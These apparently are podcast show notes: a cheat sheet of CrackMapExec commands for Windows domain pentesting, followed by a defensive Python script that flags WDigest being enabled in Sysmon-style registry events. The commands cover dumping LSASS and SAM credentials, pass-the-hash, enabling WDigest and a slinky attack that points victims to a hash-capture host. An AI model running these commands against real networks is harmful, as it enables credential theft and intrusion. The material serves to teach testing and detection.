SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass

# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler

# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac

# Find GP passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password

# Get list of targets that do not require SMB signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt

# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M wdigest -o ACTION=enable

# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy

# Do pass-the-hash attacks:
cme smb x.x.x.x -u username -H HASH

# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam

# Enumerate SMB shares:
cme smb x.x.x.x -u username -p pass --shares

# Conduct slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE
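
A defender's view of the wdigest step above, as an added example that is not from the episode or the CrackMapExec project: enabling WDigest means setting the UseLogonCredential registry value to 1, so this code flags that write in records shaped like Sysmon Event ID 13 (registry value set). The dictionary field names, hosts and sample records are constructed assumptions.

```python
import re

# Registry value that decides whether WDigest keeps plaintext credentials in LSASS.
# Matching on the suffix covers CurrentControlSet and ControlSet00x alike.
WDIGEST_SUFFIX = r"\control\securityproviders\wdigest\uselogoncredential"

# Constructed sample records (not real telemetry), shaped like Sysmon
# Event ID 13 after field extraction. Field names are assumptions.
BASE = r"HKLM\System\CurrentControlSet\Control"
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "ws01.example.test", "Details": "DWORD (0x00000001)",
     "TargetObject": BASE + r"\SecurityProviders\WDigest\UseLogonCredential"},
    {"EventID": 13, "Computer": "ws03.example.test", "Details": "DWORD (0x00000000)",
     "TargetObject": BASE + r"\SecurityProviders\WDigest\UseLogonCredential"},
    {"EventID": 13, "Computer": "dc01.example.test", "Details": "DWORD (0x00000001)",
     "TargetObject": BASE + r"\Lsa\RunAsPPL"},
    {"EventID": 13, "Computer": "srv02.example.test", "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKLM\System\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential"},
]


def parse_dword(details):
    """Return the integer from a 'DWORD (0x...)' string, or None if absent."""
    match = re.search(r"DWORD \((0x[0-9a-fA-F]+)\)", details or "")
    return int(match.group(1), 16) if match else None


def find_wdigest_enables(events):
    """Return registry-set events that leave UseLogonCredential enabled."""
    hits = []
    for event in events:
        if event.get("EventID") != 13:
            continue
        target = event.get("TargetObject", "").lower()
        if not target.endswith(WDIGEST_SUFFIX):
            continue
        value = parse_dword(event.get("Details"))
        # Only an explicit 0 is treated as safe; unparseable data is reported too.
        if value != 0:
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in find_wdigest_enables(SAMPLE_EVENTS):
        print(f"WDigest enabled on {hit['Computer']}: {hit['Details']}")
```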

Written by: Brian Johnson
